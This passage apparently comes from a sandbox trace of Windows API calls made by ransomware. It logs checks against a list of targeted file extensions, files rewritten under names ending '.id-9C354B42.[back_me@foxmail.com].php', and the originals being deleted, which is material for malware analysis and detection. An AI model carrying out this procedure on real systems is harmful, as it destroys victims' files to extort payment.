returned 5 [0046.974] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.974] lstrlenW (lpString=".pdf") returned 4 [0046.974] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.974] lstrlenW (lpString=".xls") returned 4 [0046.974] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.974] lstrlenW (lpString=".xlsx") returned 5 [0046.975] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.975] lstrlenW (lpString=".ppt") returned 4 [0046.975] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.975] lstrlenW (lpString=".zip") returned 4 [0046.975] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.975] lstrlenW (lpString=".rar") returned 4 [0046.975] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.975] lstrlenW (lpString=".bz2") returned 4 [0046.975] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.975] lstrlenW (lpString=".7z") returned 3 [0046.975] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.975] lstrlenW (lpString=".dbf") returned 4 [0046.975] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.975] lstrlenW (lpString=".1cd") returned 4 [0046.975] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.975] lstrlenW (lpString=".jpg") returned 4 [0046.975] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.975] lstrlenW (lpString=".doc") returned 4 [0046.975] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.975] lstrlenW (lpString=".docx") returned 5 [0046.975] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.975] lstrlenW (lpString=".pdf") returned 4 [0046.975] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.975] lstrlenW (lpString=".xls") returned 4 [0046.975] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.976] lstrlenW (lpString=".xlsx") returned 5 [0046.976] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.976] lstrlenW (lpString=".ppt") returned 4 [0046.976] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.976] lstrlenW (lpString=".zip") returned 4 [0046.976] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.976] lstrlenW (lpString=".rar") returned 4 [0046.976] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.976] lstrlenW (lpString=".bz2") returned 4 [0046.976] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.976] lstrlenW (lpString=".7z") returned 3 [0046.976] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.976] lstrlenW (lpString=".dbf") returned 4 [0046.976] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.976] lstrlenW (lpString=".1cd") returned 4 [0046.976] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0046.976] lstrlenW (lpString=".jpg") returned 4 [0046.976] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.976] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.976] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.977] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=32433) returned 1 [0046.977] CloseHandle (hObject=0x198) returned 1 [0046.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 0x20 [0046.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.977] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.977] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.977] GetLastError () returned 0x0 [0046.978] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x7eb1, lpOverlapped=0x0) returned 1 [0046.980] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x7ec0, lpOverlapped=0x0) returned 1 [0046.981] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.981] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.981] SetEndOfFile (hFile=0x1b0) returned 1 [0046.982] CloseHandle (hObject=0x1b0) returned 1 [0046.982] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.982] SetEndOfFile (hFile=0x198) returned 1 [0046.983] CloseHandle (hObject=0x198) returned 1 [0046.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.983] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1 [0046.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.983] lstrlenW (lpString=".doc") returned 4 [0046.983] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.983] lstrlenW (lpString=".docx") returned 5 [0046.983] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.983] lstrlenW (lpString=".pdf") returned 4 [0046.983] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.983] lstrlenW (lpString=".xls") returned 4 [0046.983] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.983] lstrlenW (lpString=".xlsx") returned 5 [0046.984] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.984] lstrlenW (lpString=".ppt") returned 4 [0046.984] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.984] lstrlenW (lpString=".zip") returned 4 [0046.984] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.984] lstrlenW (lpString=".rar") returned 4 [0046.984] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.984] lstrlenW (lpString=".bz2") returned 4 [0046.984] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.984] lstrlenW (lpString=".7z") returned 3 [0046.984] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.984] lstrlenW (lpString=".dbf") returned 4 [0046.984] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.984] lstrlenW (lpString=".1cd") returned 4 [0046.984] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.984] lstrlenW (lpString=".jpg") returned 4 [0046.984] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.984] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.984] lstrlenW (lpString=".doc") returned 4 [0046.984] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.984] lstrlenW (lpString=".docx") returned 5 [0046.984] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.984] lstrlenW (lpString=".pdf") returned 4 [0046.984] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.984] lstrlenW (lpString=".xls") returned 4 [0046.984] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.984] lstrlenW (lpString=".xlsx") returned 5 [0046.985] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.985] lstrlenW (lpString=".ppt") returned 4 [0046.985] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.985] lstrlenW (lpString=".zip") returned 4 [0046.985] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.985] lstrlenW (lpString=".rar") returned 4 [0046.985] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.985] lstrlenW (lpString=".bz2") returned 4 [0046.985] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.985] lstrlenW (lpString=".7z") returned 3 [0046.985] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.985] lstrlenW (lpString=".dbf") returned 4 [0046.985] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.985] lstrlenW (lpString=".1cd") returned 4 [0046.985] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.985] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.985] lstrlenW (lpString=".jpg") returned 4 [0046.985] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.985] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.985] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.985] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.986] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=5120) returned 1 [0046.986] CloseHandle (hObject=0x198) returned 1 [0046.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 0x20 [0046.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.986] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.986] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.264] GetLastError () returned 0x0 [0047.264] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1400, lpOverlapped=0x0) returned 1 [0047.270] WriteFile (in: hFile=0x210, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1410, lpOverlapped=0x0) returned 1 [0047.272] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.272] WriteFile (in: hFile=0x210, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.272] SetEndOfFile (hFile=0x210) returned 1 [0047.272] CloseHandle (hObject=0x210) returned 1 [0047.273] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.273] SetEndOfFile (hFile=0x198) returned 1 [0047.273] CloseHandle (hObject=0x198) returned 1 [0047.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.274] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 1 [0047.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.274] lstrlenW (lpString=".doc") returned 4 [0047.274] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.274] lstrlenW (lpString=".docx") returned 5 [0047.274] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.274] lstrlenW (lpString=".pdf") returned 4 [0047.274] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.274] lstrlenW (lpString=".xls") returned 4 [0047.274] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.274] lstrlenW (lpString=".xlsx") returned 5 [0047.274] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.274] lstrlenW (lpString=".ppt") returned 4 [0047.274] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.274] lstrlenW (lpString=".zip") returned 4 [0047.274] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.274] lstrlenW (lpString=".rar") returned 4 [0047.274] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.274] lstrlenW (lpString=".bz2") returned 4 [0047.274] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.274] lstrlenW (lpString=".7z") returned 3 [0047.274] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.274] lstrlenW (lpString=".dbf") returned 4 [0047.274] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.275] lstrlenW (lpString=".1cd") returned 4 [0047.275] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.275] lstrlenW (lpString=".jpg") returned 4 [0047.275] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.275] lstrlenW (lpString=".doc") returned 4 [0047.275] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.275] lstrlenW (lpString=".docx") returned 5 [0047.275] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.275] lstrlenW (lpString=".pdf") returned 4 [0047.275] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.275] lstrlenW (lpString=".xls") returned 4 [0047.275] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.275] lstrlenW (lpString=".xlsx") returned 5 [0047.275] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.275] lstrlenW (lpString=".ppt") returned 4 [0047.275] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.275] lstrlenW (lpString=".zip") returned 4 [0047.275] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.275] lstrlenW (lpString=".rar") returned 4 [0047.275] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.275] lstrlenW (lpString=".bz2") returned 4 [0047.275] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.275] lstrlenW (lpString=".7z") returned 3 [0047.275] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.275] lstrlenW (lpString=".dbf") returned 4 [0047.275] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.276] lstrlenW (lpString=".1cd") returned 4 [0047.276] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.276] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0047.276] lstrlenW (lpString=".jpg") returned 4 [0047.276] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.276] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.276] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.277] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=2476) returned 1 [0047.277] CloseHandle (hObject=0x198) returned 1 [0047.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 0x20 [0047.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.277] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.277] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.279] GetLastError () returned 0x0 [0047.279] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x9ac, lpOverlapped=0x0) returned 1 [0047.281] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x9b0, lpOverlapped=0x0) returned 1 [0047.282] ReadFile (in: hFile=0x198, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.282] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.282] SetEndOfFile (hFile=0x194) returned 1 [0047.282] CloseHandle (hObject=0x194) returned 1 [0047.282] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.282] SetEndOfFile (hFile=0x198) returned 1 [0047.283] CloseHandle (hObject=0x198) returned 1 [0047.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.283] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF") returned 72 [0047.284] lstrlenW (lpString=".doc") returned 4 [0047.284] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.284] lstrlenW (lpString=".docx") returned 5 